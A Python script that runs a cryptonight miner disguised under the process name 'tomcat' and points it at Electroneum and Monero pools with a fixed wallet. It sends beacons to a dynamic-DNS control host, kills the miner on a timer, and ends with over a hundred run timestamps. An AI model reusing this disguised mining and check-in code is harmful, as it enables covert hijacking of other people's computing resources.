import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:05.284144
#2018-02-17 16:58:05.607164
#2018-02-17 18:35:02.955098
#2018-02-17 20:07:06.112169
#2018-02-17 21:40:01.559627
#2018-02-17 23:09:05.218327
#2018-02-18 00:43:06.811091
#2018-02-18 02:21:06.152895
#2018-02-18 03:50:09.516617
#2018-02-18 05:25:08.130016
#2018-02-18 07:03:03.728839
#2018-02-18 08:32:01.745638
#2018-02-18 10:04:06.591229
#2018-02-18 11:37:01.485247
#2018-02-18 13:09:01.585189
#2018-02-18 14:42:06.334645
#2018-02-18 16:20:02.520380
#2018-02-18 17:51:01.959838
#2018-02-18 19:23:06.890966
#2018-02-18 20:54:07.276276
#2018-02-18 22:26:07.854926
#2018-02-19 00:02:07.388611
#2018-02-19 01:32:04.216963
#2018-02-19 03:08:04.264237
#2018-02-19 04:39:01.524967
#2018-02-19 06:09:05.123991
#2018-02-19 07:47:06.492269
#2018-02-19 09:21:08.966233
#2018-02-19 10:53:01.960641
#2018-02-19 12:25:10.995581
#2018-02-19 13:59:06.177729
#2018-02-19 15:34:07.223640
#2018-02-19 17:07:01.396099
#2018-02-19 18:39:08.557583
#2018-02-19 20:13:07.700625
#2018-02-19 21:50:08.107158
#2018-02-19 23:21:06.536927
#2018-02-20 00:54:06.660622
#2018-02-20 02:31:07.263120
#2018-02-20 04:05:09.283996
#2018-02-20 05:31:05.870382
#2018-02-20 07:04:02.091027
#2018-02-20 08:40:01.401794
#2018-02-20 10:11:06.610619
#2018-02-20 11:44:04.083406
#2018-02-20 13:21:01.709021
#2018-02-20 14:51:08.529599
#2018-02-20 16:26:04.430848
#2018-02-20 18:03:03.272535
#2018-02-20 19:42:05.059949
#2018-02-20 21:14:01.434348
#2018-02-20 22:46:09.298913
#2018-02-21 00:16:05.799405
#2018-02-21 01:53:07.486768
#2018-02-21 03:30:06.333079
#2018-02-21 05:02:01.724321
#2018-02-21 06:37:06.968301
#2018-02-21 08:10:05.948727
#2018-02-21 09:43:08.741743
#2018-02-21 11:19:02.080887
#2018-02-21 12:50:03.309397
#2018-02-21 14:24:01.518494
#2018-02-21 15:56:07.352317
#2018-02-21 17:35:05.983615
#2018-02-21 19:05:09.526726
#2018-02-21 20:41:06.776852
#2018-02-21 22:20:10.050396
#2018-02-21 23:54:07.858276
#2018-02-22 01:29:08.040215
#2018-02-22 03:03:06.523285
#2018-02-22 04:35:07.804911
#2018-02-22 06:08:07.777262
#2018-02-22 07:43:04.912319
#2018-02-22 09:18:02.049406
#2018-02-22 10:50:01.471676
#2018-02-22 12:22:07.049343
#2018-02-22 13:54:10.338392
#2018-02-22 15:31:07.636909
#2018-02-22 17:01:01.243067
#2018-02-22 18:37:04.586332
#2018-02-22 20:17:05.626541
#2018-02-22 21:48:08.436486
#2018-02-22 23:19:04.247610
#2018-02-23 00:51:07.257027
#2018-02-23 02:23:05.484242
#2018-02-23 03:56:04.206227
#2018-02-23 05:39:01.696785
#2018-02-23 07:24:02.034038
#2018-02-23 09:28:05.763127
#2018-02-23 11:33:09.332289
#2018-02-23 13:22:09.033830
#2018-02-23 15:08:08.761669
#2018-02-23 16:57:09.076262
#2018-02-23 18:46:07.842132
#2018-02-23 20:32:05.962715
#2018-02-23 22:19:06.458734
#2018-02-24 00:04:06.306485
#2018-02-24 01:56:06.606892
#2018-02-24 03:49:04.285381
#2018-02-24 05:31:06.192903
#2018-02-24 07:17:01.509983
#2018-02-24 09:07:04.730413
#2018-02-24 10:43:01.436270
#2018-02-24 12:32:03.832814
#2018-02-24 14:09:01.438707
#2018-02-24 15:38:05.385495
#2018-02-24 17:22:07.524841
#2018-02-24 18:53:04.950861
#2018-02-24 20:25:07.015599
#2018-02-24 21:56:05.499210
#2018-02-25 00:40:08.355947
#2018-02-25 02:41:05.644960
#2018-02-25 06:26:05.020826